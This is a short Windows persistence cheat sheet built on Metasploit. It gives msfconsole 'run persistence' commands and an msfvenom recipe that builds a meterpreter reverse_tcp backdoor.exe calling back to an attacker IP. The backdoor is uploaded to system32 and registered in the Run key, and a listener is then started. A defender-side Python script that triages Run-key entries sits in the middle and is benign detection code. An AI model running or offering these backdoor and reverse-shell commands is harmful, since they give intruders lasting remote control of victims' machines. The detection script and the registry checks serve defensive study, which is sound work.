Persistence via MSFconsole
attacker > msfconsole >
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
run persistence -A -X -p 443 -r 172.43.203.131 # -X: start at system boot (SYSTEM)
run persistence -A -U -p 443 -r 172.43.203.131 # -U: start at user logon
reg setval -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v autorun -d C:\\WINDOWS\\TEMP\\cNWRSvx.vbs
Registry checks
attacker > msfconsole >
# System
reg enumkey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
# Users
reg enumkey -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run
# Delete
reg deletekey -k HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\backdoor
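Defender-side counterpart to the registry checks above, added here as an example that is not part of the original cheat sheet: it triages Run-key entries exported with the Windows `reg query` command (the sample output, the baseline allowlist, the hostname-free hive names and the path heuristics are all constructed assumptions) and flags values outside a vetted baseline, script-host payloads, and images launched from user-writable directories.

```python
import re

# Constructed sample of `reg query <hive>\...\CurrentVersion\Run` output (not real data);
# the two suspicious entries mirror the artifacts the cheat sheet above leaves behind.
SAMPLE_REG_QUERY = r"""
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    backdoor    REG_SZ    C:\WINDOWS\system32\backdoor.exe

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Users\alice\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    autorun    REG_SZ    C:\WINDOWS\TEMP\cNWRSvx.vbs
"""

# Assumed baseline: (hive, value name) pairs an admin has previously vetted on this host.
BASELINE = {("HKEY_LOCAL_MACHINE", "SecurityHealth"), ("HKEY_CURRENT_USER", "OneDrive")}

HIVE_RE = re.compile(r"^(HKEY_[A-Z_]+)\\")
ENTRY_RE = re.compile(r"^ {4}(?P<name>.+?) {4}(?P<type>REG_\w+) {4}(?P<data>.*)$")
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".bat", ".cmd", ".ps1", ".hta")
WRITABLE_DIRS = ("\\temp\\", "\\tmp\\", "\\users\\public\\", "\\programdata\\")

def image_path(data):
    """Return the launched file from a Run value, dropping arguments and surrounding quotes."""
    data = data.strip()
    if data.startswith('"'):
        return data[1:data.find('"', 1)]
    return data.split(" ", 1)[0]

def triage_run_keys(reg_output, baseline=BASELINE):
    """Parse reg query output; return [(hive, name, path, [reasons])] for suspect entries."""
    findings, hive = [], None
    for line in reg_output.splitlines():
        m = HIVE_RE.match(line)
        if m:
            hive = m.group(1)          # subsequent indented lines belong to this hive
            continue
        m = ENTRY_RE.match(line)
        if not m or hive is None:
            continue
        name, path = m.group("name"), image_path(m.group("data"))
        # Heuristic expansion of the common %windir%/%SystemRoot% variables for matching.
        low = path.lower().replace("%windir%", "c:\\windows").replace("%systemroot%", "c:\\windows")
        reasons = []
        if (hive, name) not in baseline:
            reasons.append("not in baseline")
        if low.endswith(SCRIPT_EXTS):
            reasons.append("script host payload")
        if any(d in low for d in WRITABLE_DIRS):
            reasons.append("user-writable directory")
        if reasons:
            findings.append((hive, name, path, reasons))
    return findings

if __name__ == "__main__":
    for hive, name, path, reasons in triage_run_keys(SAMPLE_REG_QUERY):
        print(f"[{hive}] {name} -> {path}: {', '.join(reasons)}")
```

Anything flagged only as "not in baseline" (the system32 binary above) still needs a signature and hash check, since path heuristics alone cannot distinguish it from a legitimate component.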
Persistence via MSFVenom
attacker > shell $
msfvenom -a x86 --platform windows -p 'windows/meterpreter/reverse_tcp' lhost='172.43.203.132' lport='9999' -f exe > /tmp/backdoor.exe
victim > meterpreter >
upload /tmp/backdoor.exe C:\\WINDOWS\\system32\\
reg setval -k HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run -v autorun -d C:\\WINDOWS\\system32\\backdoor.exe
attacker > msfconsole >
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 172.43.203.132
set LPORT 9999
run